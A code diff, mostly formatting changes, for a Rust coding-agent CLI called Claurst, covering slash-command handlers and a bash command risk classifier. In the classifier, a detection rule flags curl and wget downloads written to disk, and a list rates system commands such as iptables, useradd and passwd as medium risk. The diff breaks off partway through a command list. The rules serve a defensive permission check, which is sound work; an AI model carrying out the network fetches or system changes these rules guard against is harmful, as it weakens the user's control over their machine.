 // ---------------------------------------------------------------------------
@@ -7929,14 +8566,19 @@ struct SkillCommand {
 
 #[async_trait]
 impl SlashCommand for SkillCommand {
-    fn name(&self) -> &str { &self.name }
-    fn description(&self) -> &str { &self.description }
+    fn name(&self) -> &str {
+        &self.name
+    }
+    fn description(&self) -> &str {
+        &self.description
+    }
 
     async fn execute(&self, args: &str, _ctx: &mut CommandContext) -> CommandResult {
         let mut words = args.split_whitespace();
         let arg1 = words.next().unwrap_or("");
         let arg2 = words.next().unwrap_or("");
-        let prompt = self.template
+        let prompt = self
+            .template
             .replace("$ARGUMENTS", args)
             .replace("$1", arg1)
             .replace("$2", arg2);
@@ -7957,10 +8599,8 @@ pub fn commands_from_discovered_skills(
     let discovered = claurst_core::discover_skills(cwd, skills_config);
     // Build a set of built-in command names so we can skip collisions.
     let all_cmds = all_commands();
-    let builtin_names: std::collections::HashSet<&str> = all_cmds
-        .iter()
-        .map(|c| c.name())
-        .collect();
+    let builtin_names: std::collections::HashSet<&str> =
+        all_cmds.iter().map(|c| c.name()).collect();
 
     discovered
         .into_values()
@@ -7976,11 +8616,10 @@ pub fn commands_from_discovered_skills(
 }
 
 /// Execute a slash command string (with leading /).
-pub async fn execute_command(
-    input: &str,
-    ctx: &mut CommandContext,
-) -> Option<CommandResult> {
-    if !claurst_tui::input::is_slash_command(input) { return None; }
+pub async fn execute_command(input: &str, ctx: &mut CommandContext) -> Option<CommandResult> {
+    if !claurst_tui::input::is_slash_command(input) {
+        return None;
+    }
     let (name, args) = claurst_tui::input::parse_slash_command(input);
 
     // First check built-in commands.
@@ -7991,7 +8630,10 @@ pub async fn execute_command(
     // Check user-defined command templates from settings.
     let cmd_name = name.trim_start_matches('/');
     if let Some(tmpl) = ctx.config.commands.get(cmd_name).cloned() {
-        let tc = TemplateCommand { name: cmd_name.to_string(), template: tmpl };
+        let tc = TemplateCommand {
+            name: cmd_name.to_string(),
+            template: tmpl,
+        };
         return Some(tc.execute(args, ctx).await);
     }
 
@@ -8107,13 +8749,41 @@ mod tests {
     #[test]
     fn test_core_commands_present() {
         let expected = [
-            "help", "clear", "compact", "cost", "exit", "model",
-            "config", "version", "status", "diff", "memory", "hooks",
-            "permissions", "plan", "tasks", "session", "login", "logout", "refresh",
-            "feedback", "usage", "plugin", "reload-plugins",
-            "add-dir", "agents", "branch", "tag",
-            "passes", "ide", "pr-comments", "desktop", "mobile",
-            "install-github-app", "web-setup", "stickers",
+            "help",
+            "clear",
+            "compact",
+            "cost",
+            "exit",
+            "model",
+            "config",
+            "version",
+            "status",
+            "diff",
+            "memory",
+            "hooks",
+            "permissions",
+            "plan",
+            "tasks",
+            "session",
+            "login",
+            "logout",
+            "refresh",
+            "feedback",
+            "usage",
+            "plugin",
+            "reload-plugins",
+            "add-dir",
+            "agents",
+            "branch",
+            "tag",
+            "passes",
+            "ide",
+            "pr-comments",
+            "desktop",
+            "mobile",
+            "install-github-app",
+            "web-setup",
+            "stickers",
         ];
         for name in &expected {
             assert!(

--- a/src-rust/crates/commands/src/named_commands.rs
+++ b/src-rust/crates/commands/src/named_commands.rs
@@ -46,9 +46,15 @@ pub trait NamedCommand: Send + Sync {
 pub struct AgentsCommand;
 
 impl NamedCommand for AgentsCommand {
-    fn name(&self) -> &str { "agents" }
-    fn description(&self) -> &str { "Manage and configure sub-agents" }
-    fn usage(&self) -> &str { "claude agents [list|create|edit|delete] [name]" }
+    fn name(&self) -> &str {
+        "agents"
+    }
+    fn description(&self) -> &str {
+        "Manage and configure sub-agents"
+    }
+    fn usage(&self) -> &str {
+        "claude agents [list|create|edit|delete] [name]"
+    }
 
     fn execute_named(&self, args: &[&str], ctx: &CommandContext) -> CommandResult {
         match args.first().copied().unwrap_or("list") {
@@ -70,10 +76,7 @@ impl NamedCommand for AgentsCommand {
                 for def in &defs {
                     let model_str = def.model.as_deref().unwrap_or("default model");
                     if def.description.is_empty() {
-                        out.push_str(&format!(
-                            "  \u{2022} {} ({})\n",
-                            def.name, model_str
-                        ));
+                        out.push_str(&format!("  \u{2022} {} ({})\n", def.name, model_str));
                     } else {
                         out.push_str(&format!(
                             "  \u{2022} {}: {}\n    Model: {}\n",
@@ -100,9 +103,9 @@ impl NamedCommand for AgentsCommand {
             "edit" => {
                 let name = match args.get(1).copied() {
                     Some(n) => n,
-                    None => return CommandResult::Error(
-                        "Usage: claude agents edit <name>".to_string(),
-                    ),
+                    None => {
+                        return CommandResult::Error("Usage: claude agents edit <name>".to_string())
+                    }
                 };
                 CommandResult::Message(format!(
                     "Edit .claurst/agents/{name}.md in your editor to update the agent."
@@ -111,9 +114,11 @@ impl NamedCommand for AgentsCommand {
             "delete" => {
                 let name = match args.get(1).copied() {
                     Some(n) => n,
-                    None => return CommandResult::Error(
-                        "Usage: claude agents delete <name>".to_string(),
-                    ),
+                    None => {
+                        return CommandResult::Error(
+                            "Usage: claude agents delete <name>".to_string(),
+                        )
+                    }
                 };
                 CommandResult::Message(format!(
                     "Delete .claurst/agents/{name}.md to remove the agent."
@@ -131,9 +136,15 @@ impl NamedCommand for AgentsCommand {
 pub struct AddDirCommand;
 
 impl NamedCommand for AddDirCommand {
-    fn name(&self) -> &str { "add-dir" }
-    fn description(&self) -> &str { "Add a directory to Claurst's allowed workspace paths" }
-    fn usage(&self) -> &str { "claude add-dir <path>" }
+    fn name(&self) -> &str {
+        "add-dir"
+    }
+    fn description(&self) -> &str {
+        "Add a directory to Claurst's allowed workspace paths"
+    }
+    fn usage(&self) -> &str {
+        "claude add-dir <path>"
+    }
 
     fn execute_named(&self, args: &[&str], _ctx: &CommandContext) -> CommandResult {
         let raw = match args.first() {
@@ -165,7 +176,12 @@ impl NamedCommand for AddDirCommand {
             }
         };
 
-        if !settings.config.workspace_paths.iter().any(|p| p == &abs_path) {
+        if !settings
+            .config
+            .workspace_paths
+            .iter()
+            .any(|p| p == &abs_path)
+        {
             settings.config.workspace_paths.push(abs_path.clone());
             if let Err(e) = settings.save_sync() {
                 return CommandResult::Error(format!(
@@ -190,9 +206,15 @@ impl NamedCommand for AddDirCommand {
 pub struct BranchCommand;
 
 impl NamedCommand for BranchCommand {
-    fn name(&self) -> &str { "branch" }
-    fn description(&self) -> &str { "Create a branch of the current conversation at this point" }
-    fn usage(&self) -> &str { "claude branch [create|list|switch] [name|id]" }
+    fn name(&self) -> &str {
+        "branch"
+    }
+    fn description(&self) -> &str {
+        "Create a branch of the current conversation at this point"
+    }
+    fn usage(&self) -> &str {
+        "claude branch [create|list|switch] [name|id]"
+    }
 
     fn execute_named(&self, args: &[&str], ctx: &CommandContext) -> CommandResult {
         match args.first().copied().unwrap_or("") {
@@ -309,9 +331,15 @@ impl NamedCommand for BranchCommand {
 pub struct TagCommand;
 
 impl NamedCommand for TagCommand {
-    fn name(&self) -> &str { "tag" }
-    fn description(&self) -> &str { "Toggle a searchable tag on the current session" }
-    fn usage(&self) -> &str { "claude tag [list|add|remove|toggle] [tag]" }
+    fn name(&self) -> &str {
+        "tag"
+    }
+    fn description(&self) -> &str {
+        "Toggle a searchable tag on the current session"
+    }
+    fn usage(&self) -> &str {
+        "claude tag [list|add|remove|toggle] [tag]"
+    }
 
     fn execute_named(&self, args: &[&str], ctx: &CommandContext) -> CommandResult {
         let session_id = ctx.session_id.clone();
@@ -325,9 +353,7 @@ impl NamedCommand for TagCommand {
                 match result {
                     Ok(session) => {
                         if session.tags.is_empty() {
-                            CommandResult::Message(
-                                "No tags set for this session.".to_string(),
-                            )
+                            CommandResult::Message("No tags set for this session.".to_string())
                         } else {
                             CommandResult::Message(format!(
                                 "Tags for this session:\n{}",
@@ -348,11 +374,7 @@ impl NamedCommand for TagCommand {
             "add" => {
                 let tag = match args.get(1).copied() {
                     Some(t) if !t.is_empty() => t.to_string(),
-                    _ => {
-                        return CommandResult::Error(
-                            "Usage: claude tag add <tag>".to_string(),
-                        )
-                    }
+                    _ => return CommandResult::Error("Usage: claude tag add <tag>".to_string()),
                 };
 
                 let result = tokio::task::block_in_place(|| {
@@ -370,11 +392,7 @@ impl NamedCommand for TagCommand {
             "remove" => {
                 let tag = match args.get(1).copied() {
                     Some(t) if !t.is_empty() => t.to_string(),
-                    _ => {
-                        return CommandResult::Error(
-                            "Usage: claude tag remove <tag>".to_string(),
-                        )
-                    }
+                    _ => return CommandResult::Error("Usage: claude tag remove <tag>".to_string()),
                 };
 
                 let result = tokio::task::block_in_place(|| {
@@ -390,11 +408,7 @@ impl NamedCommand for TagCommand {
             "toggle" => {
                 let tag = match args.get(1).copied() {
                     Some(t) if !t.is_empty() => t.to_string(),
-                    _ => {
-                        return CommandResult::Error(
-                            "Usage: claude tag toggle <tag>".to_string(),
-                        )
-                    }
+                    _ => return CommandResult::Error("Usage: claude tag toggle <tag>".to_string()),
                 };
 
                 // Load session to check existing tags
@@ -409,18 +423,22 @@ impl NamedCommand for TagCommand {
                         if session.tags.iter().any(|t| t == &tag) {
                             // Tag exists — remove it
                             let remove_result = tokio::task::block_in_place(|| {
-                                tokio::runtime::Handle::current()
-                                    .block_on(claurst_core::history::untag_session(&session_id, &tag_clone))
+                                tokio::runtime::Handle::current().block_on(
+                                    claurst_core::history::untag_session(&session_id, &tag_clone),
+                                )
                             });
                             match remove_result {
                                 Ok(()) => CommandResult::Message(format!("Removed tag: #{tag}")),
-                                Err(e) => CommandResult::Error(format!("Could not remove tag: {e}")),
+                                Err(e) => {
+                                    CommandResult::Error(format!("Could not remove tag: {e}"))
+                                }
                             }
                         } else {
                             // Tag absent — add it
                             let add_result = tokio::task::block_in_place(|| {
-                                tokio::runtime::Handle::current()
-                                    .block_on(claurst_core::history::tag_session(&session_id, &tag_clone))
+                                tokio::runtime::Handle::current().block_on(
+                                    claurst_core::history::tag_session(&session_id, &tag_clone),
+                                )
                             });
                             match add_result {
                                 Ok(()) => CommandResult::Message(format!("Added tag: #{tag}")),
@@ -447,9 +465,15 @@ impl NamedCommand for TagCommand {
 pub struct PassesCommand;
 
 impl NamedCommand for PassesCommand {
-    fn name(&self) -> &str { "passes" }
-    fn description(&self) -> &str { "Share a free week of Claurst with friends" }
-    fn usage(&self) -> &str { "claude passes" }
+    fn name(&self) -> &str {
+        "passes"
+    }
+    fn description(&self) -> &str {
+        "Share a free week of Claurst with friends"
+    }
+    fn usage(&self) -> &str {
+        "claude passes"
+    }
 
     fn execute_named(&self, _args: &[&str], _ctx: &CommandContext) -> CommandResult {
         CommandResult::Message(
@@ -492,9 +516,15 @@ fn is_pid_alive(pid: u64) -> bool {
 pub struct IdeCommand;
 
 impl NamedCommand for IdeCommand {
-    fn name(&self) -> &str { "ide" }
-    fn description(&self) -> &str { "Manage IDE integrations and show status" }
-    fn usage(&self) -> &str { "claude ide [status|connect|disconnect|open]" }
+    fn name(&self) -> &str {
+        "ide"
+    }
+    fn description(&self) -> &str {
+        "Manage IDE integrations and show status"
+    }
+    fn usage(&self) -> &str {
+        "claude ide [status|connect|disconnect|open]"
+    }
 
     fn execute_named(&self, _args: &[&str], _ctx: &CommandContext) -> CommandResult {
         // ---- Environment-based IDE detection --------------------------------
@@ -525,16 +555,24 @@ impl NamedCommand for IdeCommand {
                             let pid = info["pid"].as_u64().unwrap_or(0);
                             let alive = is_pid_alive(pid);
                             if alive {
-                                let ide_name = info["ideName"].as_str().unwrap_or("Unknown IDE").to_string();
+                                let ide_name = info["ideName"]
+                                    .as_str()
+                                    .unwrap_or("Unknown IDE")
+                                    .to_string();
                                 let port = info["port"].as_u64().unwrap_or(0);
                                 let workspace_folders = info["workspaceFolders"]
                                     .as_array()
-                                    .map(|a| a.iter()
-                                        .filter_map(|v| v.as_str())
-                                        .collect::<Vec<_>>()
-                                        .join(", "))
+                                    .map(|a| {
+                                        a.iter()
+                                            .filter_map(|v| v.as_str())
+                                            .collect::<Vec<_>>()
+                                            .join(", ")
+                                    })
                                     .unwrap_or_default();
-                                ides.push(format!("  {} (PID {}, port {}) \u{2014} {}", ide_name, pid, port, workspace_folders));
+                                ides.push(format!(
+                                    "  {} (PID {}, port {}) \u{2014} {}",
+                                    ide_name, pid, port, workspace_folders
+                                ));
                             } else {
                                 // Clean up dead lockfile
                                 let _ = std::fs::remove_file(&path);
@@ -548,7 +586,10 @@ impl NamedCommand for IdeCommand {
         let connection_section = if ides.is_empty() {
             "No active IDE extension connections found.".to_string()
         } else {
-            format!("Connected IDEs:\n{}\n\nUse 'claude ide open <file>' to open a file in the IDE.", ides.join("\n"))
+            format!(
+                "Connected IDEs:\n{}\n\nUse 'claude ide open <file>' to open a file in the IDE.",
+                ides.join("\n")
+            )
         };
 
         CommandResult::Message(format!("{env_section}\n\n{connection_section}"))
@@ -562,9 +603,15 @@ impl NamedCommand for IdeCommand {
 pub struct PrCommentsCommand;
 
 impl NamedCommand for PrCommentsCommand {
-    fn name(&self) -> &str { "pr-comments" }
-    fn description(&self) -> &str { "Get review comments from the current GitHub pull request" }
-    fn usage(&self) -> &str { "claude pr-comments" }
+    fn name(&self) -> &str {
+        "pr-comments"
+    }
+    fn description(&self) -> &str {
+        "Get review comments from the current GitHub pull request"
+    }
+    fn usage(&self) -> &str {
+        "claude pr-comments"
+    }
 
     fn execute_named(&self, _args: &[&str], _ctx: &CommandContext) -> CommandResult {
         // Step 1: Get current git remote + PR info via gh CLI
@@ -573,19 +620,19 @@ impl NamedCommand for PrCommentsCommand {
             .output();
 
         let pr_info = match pr_json {
-            Err(_) => return CommandResult::Error(
-                "GitHub CLI (gh) not found. Install from https://cli.github.com".to_string()
-            ),
+            Err(_) => {
+                return CommandResult::Error(
+                    "GitHub CLI (gh) not found. Install from https://cli.github.com".to_string(),
+                )
+            }
             Ok(out) if !out.status.success() => {
                 let stderr = String::from_utf8_lossy(&out.stderr);
                 return CommandResult::Error(format!("No open PR found: {}", stderr.trim()));
             }
-            Ok(out) => {
-                match serde_json::from_slice::<serde_json::Value>(&out.stdout) {
-                    Ok(v) => v,
-                    Err(_) => return CommandResult::Error("Failed to parse gh output".to_string()),
-                }
-            }
+            Ok(out) => match serde_json::from_slice::<serde_json::Value>(&out.stdout) {
+                Ok(v) => v,
+                Err(_) => return CommandResult::Error("Failed to parse gh output".to_string()),
+            },
         };
 
         let pr_number = pr_info["number"].as_u64().unwrap_or(0);
@@ -597,7 +644,10 @@ impl NamedCommand for PrCommentsCommand {
 
         // Step 2: Fetch review comments via gh API
         let comments_out = std::process::Command::new("gh")
-            .args(["api", &format!("repos/{{owner}}/{{repo}}/pulls/{}/comments", pr_number)])
+            .args([
+                "api",
+                &format!("repos/{{owner}}/{{repo}}/pulls/{}/comments", pr_number),
+            ])
             .output();
 
         let mut output = format!("PR #{} \u{2014} {}\n\n", pr_number, pr_url);
@@ -613,7 +663,10 @@ impl NamedCommand for PrCommentsCommand {
                             let user = c["user"]["login"].as_str().unwrap_or("unknown");
                             let body = c["body"].as_str().unwrap_or("").trim();
                             let body_short: String = body.chars().take(200).collect();
-                            output.push_str(&format!("  {}:{} by @{}:\n    {}\n\n", path, line, user, body_short));
+                            output.push_str(&format!(
+                                "  {}:{} by @{}:\n    {}\n\n",
+                                path, line, user, body_short
+                            ));
                         }
                     }
                     Ok(_) => output.push_str("No review comments found.\n"),
@@ -634,9 +687,15 @@ impl NamedCommand for PrCommentsCommand {
 pub struct DesktopCommand;
 
 impl NamedCommand for DesktopCommand {
-    fn name(&self) -> &str { "desktop" }
-    fn description(&self) -> &str { "Download and set up Claurst Desktop app" }
-    fn usage(&self) -> &str { "claude desktop" }
+    fn name(&self) -> &str {
+        "desktop"
+    }
+    fn description(&self) -> &str {
+        "Download and set up Claurst Desktop app"
+    }
+    fn usage(&self) -> &str {
+        "claude desktop"
+    }
 
     fn execute_named(&self, _args: &[&str], ctx: &CommandContext) -> CommandResult {
         let os = std::env::consts::OS;
@@ -655,7 +714,11 @@ impl NamedCommand for DesktopCommand {
             }
             "windows" => {
                 std::env::var("LOCALAPPDATA")
-                    .map(|p| std::path::Path::new(&p).join("Programs/Claude/Claude.exe").exists())
+                    .map(|p| {
+                        std::path::Path::new(&p)
+                            .join("Programs/Claude/Claude.exe")
+                            .exists()
+                    })
                     .unwrap_or(false)
                     || std::path::Path::new("C:\\Program Files\\Claude\\Claude.exe").exists()
             }
@@ -772,12 +835,12 @@ pub fn render_qr(url: &str) -> Vec<String> {
     while r < (width + qz) as isize {
         let mut line = String::new();
         for c in -(qz as isize)..(width + qz) as isize {
-            let top  = dark(r,     c);
-            let bot  = dark(r + 1, c);
+            let top = dark(r, c);
+            let bot = dark(r + 1, c);
             line.push(match (top, bot) {
-                (true,  true)  => '█',
-                (true,  false) => '▀',
-                (false, true)  => '▄',
+                (true, true) => '█',
+                (true, false) => '▀',
+                (false, true) => '▄',
                 (false, false) => ' ',
             });
         }
@@ -796,14 +859,20 @@ pub fn render_qr(url: &str) -> Vec<String> {
 pub struct MobileCommand;
 
 impl NamedCommand for MobileCommand {
-    fn name(&self) -> &str { "mobile" }
-    fn description(&self) -> &str { "Download the Claurst mobile app" }
-    fn usage(&self) -> &str { "claude mobile [ios|android]" }
+    fn name(&self) -> &str {
+        "mobile"
+    }
+    fn description(&self) -> &str {
+        "Download the Claurst mobile app"
+    }
+    fn usage(&self) -> &str {
+        "claude mobile [ios|android]"
+    }
 
     fn execute_named(&self, args: &[&str], ctx: &CommandContext) -> CommandResult {
-        let ios_url     = "https://apps.apple.com/app/claude-by-anthropic/id6473753684";
+        let ios_url = "https://apps.apple.com/app/claude-by-anthropic/id6473753684";
         let android_url = "https://play.google.com/store/apps/details?id=com.anthropic.claude";
-        let mobile_url  = "https://claude.ai/mobile";
+        let mobile_url = "https://claude.ai/mobile";
 
         let has_session = ctx.remote_session_url.is_some();
 
@@ -817,16 +886,19 @@ impl NamedCommand for MobileCommand {
 
         // Choose which platform / URL to show the QR for (default: claude.ai/mobile).
         let (platform_label, qr_url): (&str, &str) = match args.first().copied().unwrap_or("") {
-            "ios" | "1"         => ("[1] iOS  (selected)", ios_url),
-            "android" | "2"     => ("[2] Android  (selected)", android_url),
-            "session" | "3"     => {
+            "ios" | "1" => ("[1] iOS  (selected)", ios_url),
+            "android" | "2" => ("[2] Android  (selected)", android_url),
+            "session" | "3" => {
                 if has_session {
                     ("[3] Session  (selected)", session_qr_url.as_str())
                 } else {
-                    ("session link unavailable \u{2014} no active remote session", mobile_url)
+                    (
+                        "session link unavailable \u{2014} no active remote session",
+                        mobile_url,
+                    )
                 }
             }
-            _                   => ("both platforms", mobile_url),
+            _ => ("both platforms", mobile_url),
         };
 
         let qr_lines = render_qr(qr_url);
@@ -835,7 +907,9 @@ impl NamedCommand for MobileCommand {
         out.push_str("Scan to download Claurst mobile app\n");
         out.push_str(&format!("Platform: {platform_label}\n\n"));
         if has_session {
-            out.push_str("  [1] iOS    [2] Android    [3] Session (QR links to active session)\n\n");
+            out.push_str(
+                "  [1] iOS    [2] Android    [3] Session (QR links to active session)\n\n",
+            );
         } else {
             out.push_str("  [1] iOS    [2] Android\n\n");
         }
@@ -867,9 +941,15 @@ impl NamedCommand for MobileCommand {
 pub struct InstallGithubAppCommand;
 
 impl NamedCommand for InstallGithubAppCommand {
-    fn name(&self) -> &str { "install-github-app" }
-    fn description(&self) -> &str { "Set up Claurst GitHub Actions for a repository" }
-    fn usage(&self) -> &str { "claude install-github-app" }
+    fn name(&self) -> &str {
+        "install-github-app"
+    }
+    fn description(&self) -> &str {
+        "Set up Claurst GitHub Actions for a repository"
+    }
+    fn usage(&self) -> &str {
+        "claude install-github-app"
+    }
 
     fn execute_named(&self, _args: &[&str], _ctx: &CommandContext) -> CommandResult {
         CommandResult::Message(
@@ -891,9 +971,15 @@ impl NamedCommand for InstallGithubAppCommand {
 pub struct RemoteSetupCommand;
 
 impl NamedCommand for RemoteSetupCommand {
-    fn name(&self) -> &str { "remote-setup" }
-    fn description(&self) -> &str { "Check and configure a remote Claurst environment" }
-    fn usage(&self) -> &str { "claude remote-setup" }
+    fn name(&self) -> &str {
+        "remote-setup"
+    }
+    fn description(&self) -> &str {
+        "Check and configure a remote Claurst environment"
+    }
+    fn usage(&self) -> &str {
+        "claude remote-setup"
+    }
 
     fn execute_named(&self, _args: &[&str], _ctx: &CommandContext) -> CommandResult {
         let mut steps = Vec::new();
@@ -903,14 +989,22 @@ impl NamedCommand for RemoteSetupCommand {
         steps.push(format!(
             "{} ANTHROPIC_API_KEY {}",
             if has_api_key { "\u{2713}" } else { "\u{2717}" },
-            if has_api_key { "is set".to_string() } else { "is NOT set \u{2014} run: export ANTHROPIC_API_KEY=sk-...".to_string() }
+            if has_api_key {
+                "is set".to_string()
+            } else {
+                "is NOT set \u{2014} run: export ANTHROPIC_API_KEY=sk-...".to_string()
+            }
         ));
 
         // Step 2: Check SSH agent forwarding (check SSH_AUTH_SOCK)
         let has_ssh_agent = std::env::var("SSH_AUTH_SOCK").is_ok();
         steps.push(format!(
             "{} SSH agent forwarding {}",
-            if has_ssh_agent { "\u{2713}" } else { "\u{25cb}" },
+            if has_ssh_agent {
+                "\u{2713}"
+            } else {
+                "\u{25cb}"
+            },
             if has_ssh_agent {
                 "detected".to_string()
             } else {
@@ -919,7 +1013,9 @@ impl NamedCommand for RemoteSetupCommand {
         ));
 
         // Step 3: Check claude config dir exists
-        let config_dir = dirs::home_dir().map(|h| h.join(".claurst")).unwrap_or_default();
+        let config_dir = dirs::home_dir()
+            .map(|h| h.join(".claurst"))
+            .unwrap_or_default();
         let has_config = config_dir.exists();
         steps.push(format!(
             "{} Claurst config dir {}",
@@ -933,9 +1029,12 @@ impl NamedCommand for RemoteSetupCommand {
 
         // Step 4: Check internet connectivity
         let net_ok = std::net::TcpStream::connect_timeout(
-            &"api.anthropic.com:443".parse().unwrap_or_else(|_| "8.8.8.8:53".parse().unwrap()),
+            &"api.anthropic.com:443"
+                .parse()
+                .unwrap_or_else(|_| "8.8.8.8:53".parse().unwrap()),
             std::time::Duration::from_secs(3),
-        ).is_ok();
+        )
+        .is_ok();
         steps.push(format!(
             "{} Network connectivity {}",
             if net_ok { "\u{2713}" } else { "\u{2717}" },
@@ -969,17 +1068,23 @@ impl NamedCommand for RemoteSetupCommand {
 pub struct StickersCommand;
 
 impl NamedCommand for StickersCommand {
-    fn name(&self) -> &str { "stickers" }
-    fn description(&self) -> &str { "Open the Claurst sticker page in your browser" }
-    fn usage(&self) -> &str { "claude stickers" }
+    fn name(&self) -> &str {
+        "stickers"
+    }
+    fn description(&self) -> &str {
+        "Open the Claurst sticker page in your browser"
+    }
+    fn usage(&self) -> &str {
+        "claude stickers"
+    }
 
     fn execute_named(&self, _args: &[&str], _ctx: &CommandContext) -> CommandResult {
         let url = "https://www.stickermule.com/claudecode";
         match open::that(url) {
             Ok(_) => CommandResult::Message(format!("Opening stickers page: {url}")),
-            Err(e) => CommandResult::Message(format!(
-                "Visit: {url}\n(Could not open browser: {e})"
-            )),
+            Err(e) => {
+                CommandResult::Message(format!("Visit: {url}\n(Could not open browser: {e})"))
+            }
         }
     }
 }
@@ -991,13 +1096,20 @@ impl NamedCommand for StickersCommand {
 pub struct UltraplanCommand;
 
 impl NamedCommand for UltraplanCommand {
-    fn name(&self) -> &str { "ultraplan" }
-    fn description(&self) -> &str { "Launch Ultraplan agentic code planner with extended thinking" }
-    fn usage(&self) -> &str { "claude ultraplan [--effort=medium|high|maximum]" }
+    fn name(&self) -> &str {
+        "ultraplan"
+    }
+    fn description(&self) -> &str {
+        "Launch Ultraplan agentic code planner with extended thinking"
+    }
+    fn usage(&self) -> &str {
+        "claude ultraplan [--effort=medium|high|maximum]"
+    }
 
     fn execute_named(&self, args: &[&str], _ctx: &CommandContext) -> CommandResult {
         // Parse effort level from args
-        let effort = args.iter()
+        let effort = args
+            .iter()
             .find(|arg| arg.starts_with("--effort="))
             .and_then(|arg| arg.strip_prefix("--effort="))
             .unwrap_or("medium");

--- a/src-rust/crates/core/src/attachments.rs
+++ b/src-rust/crates/core/src/attachments.rs
@@ -37,7 +37,11 @@ pub struct Attachment {
 
 impl Attachment {
     pub fn new(kind: AttachmentKind, content: impl Into<String>) -> Self {
-        Self { kind, content: content.into(), label: None }
+        Self {
+            kind,
+            content: content.into(),
+            label: None,
+        }
     }
 
     pub fn with_label(mut self, label: impl Into<String>) -> Self {
@@ -71,7 +75,11 @@ pub fn get_attachments(ctx: &AttachmentContext<'_>) -> Vec<Attachment> {
         if !changed.is_empty() {
             let content = format!(
                 "Files changed since last turn:\n{}",
-                changed.iter().map(|f| format!("  {}", f)).collect::<Vec<_>>().join("\n")
+                changed
+                    .iter()
+                    .map(|f| format!("  {}", f))
+                    .collect::<Vec<_>>()
+                    .join("\n")
             );
             attachments.push(Attachment::new(AttachmentKind::ChangedFiles, content));
         }
@@ -155,13 +163,11 @@ pub fn get_changed_files(project_root: &Path, since_ms: u64) -> Vec<String> {
         .output();
 
     match output {
-        Ok(out) if out.status.success() => {
-            String::from_utf8_lossy(&out.stdout)
-                .lines()
-                .filter(|l| !l.is_empty())
-                .map(|l| l.to_string())
-                .collect()
-        }
+        Ok(out) if out.status.success() => String::from_utf8_lossy(&out.stdout)
+            .lines()
+            .filter(|l| !l.is_empty())
+            .map(|l| l.to_string())
+            .collect(),
         _ => {
             // Fallback: scan for files modified since timestamp using mtime
             let since_secs = since_ms / 1000;

--- a/src-rust/crates/core/src/auth_store.rs
+++ b/src-rust/crates/core/src/auth_store.rs
@@ -89,9 +89,7 @@ impl AuthStore {
                     }
                 }
                 StoredCredential::OAuthToken {
-                    access,
-                    refresh,
-                    ..
+                    access, refresh, ..
                 } if provider_id == "github-copilot" => {
                     if !refresh.is_empty() {
                         return Some(refresh.clone());

--- a/src-rust/crates/core/src/bash_classifier.rs
+++ b/src-rust/crates/core/src/bash_classifier.rs
@@ -192,9 +192,8 @@ pub fn classify_bash_command(command: &str) -> BashRiskLevel {
     // Network writes to disk (general curl/wget with -o / redirect)
     {
         let lower = cmd.to_lowercase();
-        let is_network_fetch = lower.starts_with("curl ")
-            || lower.starts_with("wget ")
-            || lower.starts_with("fetch ");
+        let is_network_fetch =
+            lower.starts_with("curl ") || lower.starts_with("wget ") || lower.starts_with("fetch ");
         if is_network_fetch {
             let writes_to_disk = lower.contains(" -o ")
                 || lower.contains(" -o\t")
@@ -229,20 +228,49 @@ pub fn classify_bash_command(command: &str) -> BashRiskLevel {
     }
 
     // Process signals
-    if cmd.starts_with("kill ") || cmd == "kill" || cmd.starts_with("pkill ") || cmd.starts_with("killall ") {
+    if cmd.starts_with("kill ")
+        || cmd == "kill"
+        || cmd.starts_with("pkill ")
+        || cmd.starts_with("killall ")
+    {
         return BashRiskLevel::Medium;
     }
 
     // System configuration
     let medium_cmds = [
-        "systemctl ", "service ", "ufw ", "iptables ", "ip6tables ",
-        "firewall-cmd ", "chown ", "chmod ", "chgrp ",
-        "crontab ", "at ", "useradd ", "userdel ", "usermod ",
-        "groupadd ", "groupdel ", "passwd ",
-        "mount ", "umount ", "fdisk ", "parted ",
-        "apt ", "apt-get ", "yum ", "dnf ", "pacman ", "brew ",
-        "snap ", "flatpak ", "dpkg ", "rpm ",
-        "mktemp ", "truncate ",
+        "systemctl ",
+        "service ",
+        "ufw ",
+        "iptables ",
+        "ip6tables ",
+        "firewall-cmd ",
+        "chown ",
+        "chmod ",
+        "chgrp ",
+        "crontab ",
+        "at ",
+        "useradd ",
+        "userdel ",
+        "usermod ",
+        "groupadd ",
+        "groupdel ",
+        "passwd ",
+        "mount ",
+        "umount ",
+        "fdisk ",
+        "parted ",
+        "apt ",
+        "apt-get ",
+        "yum ",
+        "dnf ",
+        "pacman ",
+        "brew ",
+        "snap ",
+        "flatpak ",
+        "dpkg ",
+        "rpm ",
+        "mktemp ",
+        "truncate ",
     ];
     for mc in &medium_cmds {
         if cmd.starts_with(mc) {
@@ -279,36 +307,108 @@ pub fn classify_bash_command(command: &str) -> BashRiskLevel {
 
     let (bin, args) = split_command(cmd);
     let low_cmds = [
-        "git", "npm", "npx", "yarn", "pnpm",
-        "cargo", "rustup", "rustc",
-        "pip", "pip3", "python", "python3",
-        "node", "deno", "bun",
-        "go", "mvn", "gradle", "gradle",
-        "make", "cmake", "meson", "ninja",
-        "docker", "docker-compose", "podman",
-        "kubectl", "helm", "terraform", "ansible",
-        "ssh", "scp", "rsync",
-        "tar", "zip", "unzip", "gzip", "gunzip", "7z",
-        "touch", "mkdir", "cp", "ln",
-        "tee", "wc", "sort", "uniq", "head", "tail",
-        "sed", "awk", "cut", "tr",
-        "xargs", "parallel",
-        "jq", "yq", "tomlq",
-        "less", "more", "man",
-        "env", "export", "source", ".",
-        "printf", "date", "uname", "hostname",
-        "which", "whereis", "type",
-        "du", "df", "free", "uptime", "top", "htop", "ps",
-        "lsof", "strace", "ltrace",
-        "diff", "patch",
+        "git",
+        "npm",
+        "npx",
+        "yarn",
+        "pnpm",
+        "cargo",
+        "rustup",
+        "rustc",
+        "pip",
+        "pip3",
+        "python",
+        "python3",
+        "node",
+        "deno",
+        "bun",
+        "go",
+        "mvn",
+        "gradle",
+        "gradle",
+        "make",
+        "cmake",
+        "meson",
+        "ninja",
+        "docker",
+        "docker-compose",
+        "podman",
+        "kubectl",
+        "helm",
+        "terraform",
+        "ansible",
+        "ssh",
+        "scp",
+        "rsync",
+        "tar",
+        "zip",
+        "unzip",
+        "gzip",
+        "gunzip",
+        "7z",
+        "touch",
+        "mkdir",
+        "cp",
+        "ln",
+        "tee",
+        "wc",
+        "sort",
+        "uniq",
+        "head",
+        "tail",
+        "sed",
+        "awk",
+        "cut",
+        "tr",
+        "xargs",
+        "parallel",
+        "jq",
+        "yq",
+        "tomlq",
+        "less",
+        "more",
+        "man",
+        "env",
+        "export",
+        "source",
+        ".",
+        "printf",
+        "date",
+        "uname",
